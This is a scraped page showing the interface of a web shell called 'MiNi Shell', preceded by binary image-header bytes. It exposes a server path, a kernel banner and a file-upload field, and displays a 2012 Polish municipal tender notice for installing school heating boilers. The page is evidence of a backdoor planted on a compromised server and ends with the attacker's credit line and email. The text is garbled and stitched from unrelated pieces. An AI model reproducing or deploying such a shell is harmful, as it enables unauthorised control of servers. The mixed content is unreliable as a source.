JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/153165-N-2012.html

<p class="kh_header"><b>Górno: Dostawa wraz z montażem 3 kotłów centralnego ogrzewania na potrzeby szkół na terenie gm. Górno</b><br>
<b>Numer ogłoszenia: 153165 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Górno , Górno 169, 26-008 Górno, woj. świętokrzyskie, tel. 041 3023018, faks 041 3023009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem 3 kotłów centralnego ogrzewania na potrzeby szkół na terenie gm. Górno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa oraz montaż 3 kotłów centralnego ogrzewania na potrzeby szkół na terenie gm. Górno. 
1. Dostawa oraz montaż 1 kotła centralnego ogrzewania na potrzeby Szkoły Podstawowej w Radlinie
a) wymagane parametry:
- kocioł miałowy z podajnikiem tłokowym o mocy cieplnej minimum 140 kW ze sterowanym regulatorem procesem palenia oraz wentylatorem nadmuchowym
- kocioł na paliwo podstawowe: miał węglowy od 19 do 25 MJ/Kg granulacja do 31,5 mm oraz na paliwo zastępcze: eko-groszek
- wyposażenie w ruszt awaryjny umożliwiający w razie konieczności spalanie innych paliw stałych (np. drewna) 
- powierzchnia grzewcza: min. 13 m2
- sprawność cieplna: min. 85%
- dopuszczalne ciśnienie robocze: minimum 2 bary
- rok produkcji: minimum 2011 
- pojemność wodna kotła: minimum 500 l
- maksymalna temperatura wody w kotle: 90 st C
- możliwość czyszczenia kotła bez konieczności jego wygaszania (dopuszcza się ciągły proces palenia w całym sezonie grzewczym z przerwami na okresowe czyszczenie) 
- wykonanie niezbędnych prac demontażowo - budowlanych oraz prac montażowo - budowlanych  
- wykonanie niezbędnej instalacji c.o w kotłowni w celu prawidłowego podłączenia kotła, 
- podłączenie nowego kotła do komina (wykonanie czopucha) 
- podłączenie do zasobnika c.w.u 
- próba szczelności instalacji i uruchomienie kotłów 
- wszystkie inne niewymienione czynności (bądź urządzenia) niezbędnego do prawidłowego funkcjonowania oferowanego kotła

b) istnieje możliwość wniesienia kotła do pomieszczenia zsypu opału wlotem wsypu na węgiel w kotłowni o wymiarach 165x120 cm, przetransportowanie wewnątrz kotłowni całego kotła do miejsca docelowego (drzwi kotłownia-zsyp: 115x200 cm). Kotłownia znajduje się w piwnicy
c) UWAGA: Zamawiający zamieszcza zdjęcia poglądowe. (Zdjęcia przedstawiają wcześniej zamontowane kotły grzewcze. Demontaż starego kotła przed instlacja nowego kotła leży w gestii Zamawiającego). Jednak ze względu na charakter zamówienia oraz na warunki terenowe utrudniające swobodne operowanie ciężkim sprzętem sugeruje się wykonanie wizji lokalnej w terenie po wcześniejszym uzgodnieniu terminu z Zamawiającym i uwzględnieniu w ofercie wszelkich niezbędnych prac do wykonania całości zamówienia.

2. Dostawa oraz montaż 2 kotłów centralnego ogrzewania na potrzeby Zespołu Szkół w Bęczkowie 
(2 takie same kotły)

a) wymagane parametry:
- kocioł miałowy z podajnikiem tłokowym o mocy cieplnej minimum 250 kW ze sterowanym regulatorem procesem palenia oraz wentylatorem nadmuchowym, 
- kocioł na paliwo podstawowe: miał węglowy od 19 do 25 MJ/Kg granulacja do 31,5 mm oraz na paliwo zastępcze: eko-groszek
- wyposażenie w ruszt awaryjny umożliwiający w razie konieczności spalanie innych paliw stałych (np. drewna) 
- powierzchnia grzewcza: min. 25 m2
- sprawność cieplna: min. 80%
- dopuszczalne ciśnienie: minimum 2 bary
- rok produkcji: minimum 2011 
- pojemność wodna kotła: minimum 750 l
- maksymalna temperatura wody w kotle: 90 st C
- możliwość czyszczenia kotła bez konieczności jego wygaszania (dopuszcza się ciągły proces palenia w całym sezonie grzewczym z przerwami na okresowe czyszczenie) 
- wykonanie niezbędnych prac demontażowo - budowlanych oraz prac montażowo - budowlanych  
- wykonanie niezbędnej instalacji c.o w kotłowni w celu prawidłowego podłączenia kotła 
- podłączenie nowego kotła do komina (wykonanie czopucha)
- podłączenie do zasobnika c.w.u wraz z wymianą czopucha
- próba szczelności instalacji i uruchomienie kotłów
- wszystkie inne niewymienione czynności (bądź urządzenia) niezbędnego do prawidłowego funkcjonowania oferowanego kotła

b) istnieje możliwość dojazdu do kotłowni poprzez drzwi o wymiarach ok. 220 x 240 cm do których prowadzi z zewnątrz pochylnia. W pomieszczeniu kotłowni znajdują się rury ciepłownicze na wysokości 230 cm i jest to wysokość maksymalna do operowania sprzętem podczas prac montażowych. Dojazd drogą wewnętrzną o nawierzchni utwardzonej.
c) UWAGA: Zamawiający zamieszcza zdjęcia poglądowe. (Zdjęcia przedstawiają wcześniej zamontowane kotły grzewcze. Demontaż starych kotłów przed instalacją nowych leży w gestii Zamawiającego.) Jednak ze względu na charakter zamówienia oraz na warunki terenowe utrudniające swobodne operowanie ciężkim sprzętem sugeruje się wykonanie wizji lokalnej w terenie po wcześniejszym uzgodnieniu terminu z Zamawiającym i uwzględnieniu w ofercie wszelkich niezbędnych prac do wykonania całości zamówienia.

3. Wymaga się aby wszystkie materiały i urządzenia, wykorzystane w realizacji zamówienia posiadały stosowne atesty oraz dopuszczenie do użytkowania. Kotły c.o. muszą posiadać znak bezpieczeństwa ekologicznego. Wymienione dokumenty wymagane będą od Wykonawcy przed podpisaniem umowy.

4. W ramach zaoferowanej ceny należy osobom wskazanym przez dyrektorów placówek (palacze, konserwatorzy itp.) wskazać i objaśnić wszystkie funkcje niezbędne do prawidłowego funkcjonowania i eksploatacji dostarczonego kotła.

5. Kotły wraz z wyposażeniem objęte będą 36-miesięczną gwarancją. Czas na podjęcie czynności naprawy / wymiany nie więcej jak 2 dni robocze (Dni robocze - wszystkie dni nie wymienione w ustawie z dnia 18 stycznia 1951 r. o dniach wolnych od pracy (Dz.U. z 1951 r. Nr 4, poz. 28, z późn. zm.) od daty zgłoszenia telefonicznego stwierdzonej usterki / wady..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.62.12.00-1, 42.34.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 dostawę wraz z montażem kotłów o charakterze odpowiadającym przedmiotowi zamówienia o wartości minimum 30 000 zł brutto oraz załączeniem dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę (Zał. Nr 2),
2) Dokument potwierdzający posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzenia pisemnych zmian umowy z Wykonawcą na podstawie art. 144 ust. 1 Ustawy PZP przy wystąpieniu następujących okoliczności:
1.1. Zmiana terminu umownego (pkt IV.2 SIWZ): 
- wstrzymania świadczenia dostawy / usługi lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,
- działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, które wystąpią po zawarciu umowy, a których strony nie były w stanie przewidzieć w momencie jej zawarcia i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty,
- istotnej zmiany zakresu świadczenia Wykonawcy stwierdzonej w formie pismnej, która powoduje konieczność zmiany terminu zakończenia wykonania przedmiotu umowy
2.2. Pozostałe zmiany
- gdy nastapi zmiana powszechnie obowiazujacych przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorno.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Górnie, Górno 169, Pokój nr 16 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 10:00, miejsce: Urząd Gminy w Górnie, Górno 169, Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com